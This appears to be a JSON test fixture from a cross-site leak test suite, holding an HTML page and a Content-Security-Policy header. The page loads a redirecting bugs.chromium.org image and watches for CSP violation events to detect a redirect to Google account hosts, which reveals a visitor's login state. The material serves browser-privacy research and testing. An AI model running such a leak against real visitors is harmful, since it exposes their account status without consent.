```json
{
  "c932892": {
    "a.test": {
      "main": {
        "index.html": "<img id=\"123\" src=\"https://bugs.chromium.org/redirectedImage\">\n\n<script>\n  document.addEventListener(\"securitypolicyviolation\", function (e) {\n    console.log(\"Blocked URI: \" + e.blockedURI);\n    if (e.blockedURI.indexOf(\"accounts.google.com\") > -1 || e.blockedURI.indexOf(\"googleusercontent.com\") > -1) {\n      document.location.href = \"https://a.test/report/?leak=c932892\";\n    }\n  });\n</script>\n",
        "headers.json": "[\n    {\n        \"key\": \"Content-Security-Policy\",\n        \"value\": \"img-src 'self' bugs.chromium.org; report-uri /report/?leak=c932892\"\n    }\n]"
      }
    }
  }
}
```